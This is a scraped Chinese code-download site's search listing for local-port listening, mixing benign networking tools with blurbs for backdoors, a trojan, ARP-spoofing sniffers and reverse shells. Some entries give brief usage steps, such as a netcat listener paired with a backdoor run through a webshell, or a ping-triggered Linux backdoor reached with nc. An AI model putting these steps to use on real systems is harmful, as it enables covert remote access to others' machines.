搜索资源列表
FTP,文件传输!SMTP设计
- 1)用户界面模块负责响应用户的键盘鼠标输入设置服务器的各个参数,显示服务器的工作状态以及错误提示,为用户提供标准的Windows界面。 2)帐户管理模块负责设置用户的访问权限,用户登陆后的根目录,并提供对用户透明的虚拟目录服务。同时还为别的模块提供查询文件(夹)的权限,查找本地文件是否存在等服务, 3)连接监听与FTP命令处理模块负责监听客户端的连接,并负责关闭阻塞的连接,释放每个连接占用的资源。此模块为FTP协议的核心,它具体负责FT
t_cmd
- T-Cmd v1.0是一个服务级的后门程序,适用平台 为Windows2000/XP。它可自动为远程/本地主机创建服务级后门,无须使用任何额外的命令, 支持本地/远程模式。重启后,程序仍然自动运行,监听端口20540/tcp。-T-Cmd v1.0 is a service-level backdoor procedure, the application platform for Windows2000/XP. It can
minimuma
- 一个小型的*。分为读取信息,本地监听和绑定三个部分。通信部分用socket实现。-a small wooden horse. The information is divided into reading, listening and local bundled in three parts. Socket Communications partly achieved.
远程控制自己来系列教程之自动上线
- [说明]: 转载请署名出处 [信息原地址]: 邪恶八进制信息安全团队&http://www.eviloctal.com [控制端说明]: 服务端监听本地的449端口并识别标志为 \"info\" 的封包; 封包原型:info ip >>> Pcname >>> OsVer 数据例子:info127.0.0.1>>>Jony&g
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd.
Tiny_Shell3
- 反向连接+穿防火墙Shell,体积2.4k For:Delphi VI 本地开NC监听8848端口即可以测试,-reverse link wear firewall Shell, volume kbps For : Delphi VI opened the local NC eavesdropping 8848 port that can test,
netlistener
- Java局域网监听器 监听本地网段(同个路由器内的网段)指定IP的IP数据包. 原理是ARP欺骗的方法,欺骗了目标IP的机器的ARP缓存以及本地路由器内的ARP表,让路由器跟目标IP之间的数据都必须经过运行这个软件的机器。 因为涉及到数据链路层的数据包操作,需要JPCAP这个包来增加JAVA对数据链路层的支持,所以要运行这个软件除了虚拟机还需要安装winpcap(windows)/libpcap(linux)+JPCAP才能
netListener
- 可以监听本地网段(同个路由器内的网段)指定IP的IP数据包. 原理是ARP欺骗的方法,欺骗了目标IP的机器的ARP缓存以及本地路由器内的ARP表,让路由器跟目标IP之间的数据都必须经过运行这个软件的机器。 因为涉及到数据链路层的数据包操作,需要JPCAP这个包来增加JAVA对数据链路层的支持,所以要运行这个软件除了虚拟机还需要安装winpcap(windows)/libpcap(linux)+JPCAP才能运行。
tinycode
- 自动为远程/本地主机创建服务级后门,无须使用任何额外的命令,支持本地/远程模式。重启后,程序仍然自动运行。监听端口20540-automatically for remote/local host service level to create a back door without the use of any additional orders, support local/remote mode. After the restar
远程控制自己来系列教程之自动上线
- [说明]: 转载请署名出处 [信息原地址]: 邪恶八进制信息安全团队&http://www.eviloctal.com [控制端说明]: 服务端监听本地的449端口并识别标志为 "info" 的封包; 封包原型:info ip >>> Pcname >>> OsVer 数据例子:info127.0.0.1>>>Jony>
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd.
netlistener
- Java局域网监听器 监听本地网段(同个路由器内的网段)指定IP的IP数据包. 原理是ARP欺骗的方法,欺骗了目标IP的机器的ARP缓存以及本地路由器内的ARP表,让路由器跟目标IP之间的数据都必须经过运行这个软件的机器。 因为涉及到数据链路层的数据包操作,需要JPCAP这个包来增加JAVA对数据链路层的支持,所以要运行这个软件除了虚拟机还需要安装winpcap(windows)/libpcap(linux)+JPCAP才能
netListener
- 可以监听本地网段(同个路由器内的网段)指定IP的IP数据包. 原理是ARP欺骗的方法,欺骗了目标IP的机器的ARP缓存以及本地路由器内的ARP表,让路由器跟目标IP之间的数据都必须经过运行这个软件的机器。 因为涉及到数据链路层的数据包操作,需要JPCAP这个包来增加JAVA对数据链路层的支持,所以要运行这个软件除了虚拟机还需要安装winpcap(windows)/libpcap(linux)+JPCAP才能运行。-Can mon
JK_CENTER
- 建立了TCP服务器,可以监听本地端口,通信后可以读出客户端的IP地址和相应端口。-The establishment of a TCP server, you can monitor the local port, communications can be read out after the client' s IP address and corresponding port.
CmdSocket
- Cmd管道,可以正向连接和反向连接,正向连接开监听本地端口,反向需要指定连接到的IP和端口-Cmd pipe, you can forward link and reverse link, forward local port to connect to open listening, reverse need to specify the IP and port to connect to the
Sniffer
- 可监听本地机接受到的所有数据,有利于初学者对数据包的分析-Can monitor the local machine receives all the data will help beginners on the analysis of the data packet
cSharp-tcp-ip
- C#编写的TCP/IP文字传输,可以连接到远程地址、端口,也可以监听本地端口-Written in C# TCP/IP Transfer, you can connect to the remote address, port, local port can monitor
pingshell.tar
- 一个linux的pingshell后门,首先编译pingshell.c后门, 编译后生成的pingshell这个文件就是我们的后门了,然后使用命令 pingshell 1017 5555,意思是当接受当ping包长度为1017时监听本地5555端口,ping -l 1017 127.0.0.1 然后用nc进行连接,nc -nvv ip 5555即可。 注:这种后门有个问题就是如果进行暴力破解的话,也不
DeviceListener_new
- Java实现对本地设备的监听,具体实现已封装为DLL文件。(Java implements local device listening)
sokit-master
- 功能强大的网络调试工具sokit源码 本程序可以工作在三种模式: 服务器模式,用来监听本地端口,接收外部数据包,并且可以回复自定义数据; 客户端模式,用来连接服务器,发送自定义数据包,并接收远程回复数据; 转发器模式,用来监听本地端口,将接收到的数据包发送给指定的远程服务器,也可以在转发数据流中插入自定义数据向双发发送; 支持发送ascii字符串数据,以及十六进制表示的原始字节,单次发送的字符数目没有限制;收到的数据会同时以这两种形式